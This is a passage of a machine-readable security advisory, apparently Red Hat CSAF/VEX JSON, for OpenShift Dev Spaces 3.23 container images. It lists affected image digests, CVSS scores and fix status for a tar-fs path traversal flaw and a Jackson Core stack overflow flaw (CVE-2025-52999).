            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          "products": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "tar-fs: tar-fs has issue where extract can write outside the specified dir with a specific tarball"
    },
    {
      "cve": "CVE-2025-52999",
      "cwe": {
        "id": "CWE-121",
        "name": "Stack-based Buffer Overflow"
      },
      "discovery_date": "2025-06-25T18:00:54.693716+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x",
            "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2374804"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A nested data handling flaw was found in Jackson Core. When parsing particularly deeply nested data structures, a StackoverflowError can occur.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "com.fasterxml.jackson.core/jackson-core: jackson-core Potential StackoverflowError",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64",
          "Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le",
